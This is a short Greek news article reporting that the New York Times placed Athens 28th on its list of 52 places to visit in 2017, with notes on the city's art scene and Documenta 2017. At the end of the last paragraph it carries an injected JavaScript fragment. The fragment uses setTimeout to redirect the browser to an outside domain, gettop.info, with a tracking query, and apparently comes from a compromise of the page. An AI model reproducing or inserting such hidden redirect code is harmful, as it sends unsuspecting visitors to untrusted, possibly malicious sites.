Η Αθήνα στους 52 τουριστικούς προορισμούς των ΝΥΤ

0
10

 

Η Αθήνα εμφανίστηκε ξανά στον κατάλογο που συντάσσουν οι New York Times με τους 52 προορισμούς στον κόσμο οι οποίοι προτέινονται για επίσκεψη το 2017.

Στον κατάλογο με τις χώρες-μέρη που προτείνονται για επίσκεψη η Αθήνα βρίσκεται στην 28η θέση. Στην πρώτη θέση είναι ο Καναδάς, στη δεύτερη η Έρημος Ατακάμα στη Χιλή, στην τρίτη η Αγκρα στην Ινδία, στην Τέταρτη το Ζερμάτ της Ελβετίας και στην πέμπτη θέση η Μποτσουάνα.

Για την Αθήνα οι New York Times τονίζουν ότι οι τιμές έχουν πέσει αλλά η κρίση του ελληνικού χρέους δεν έχει μετριαστεί στην ακμάζουσα καλλιτεχνική σκηνή της Αθήνας. Τα τελευταία χρόνια στην Αθήνα έχουν αυξηθεί οι χώροι που είναι αφιερωμένοι στην Τέχνη, ενώ το ανακαινισμένο Εθνικό Μουσείο Σύγχρονης Τέχνης και το Κέντρο Πολιτισμού Ίδρυμα Σταύρος που σχεδιάστηκε από τον Renzo Piano αποτελούν ισχυρούς πόλους έλξης για επίσκεψη στην Αθήνα.

Μάλιστα οι New York Times εστιάζουν και στην έκθεση Documenta 2017 που για πρώτη φορά θα λάβει χώρα στην Αθήνα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here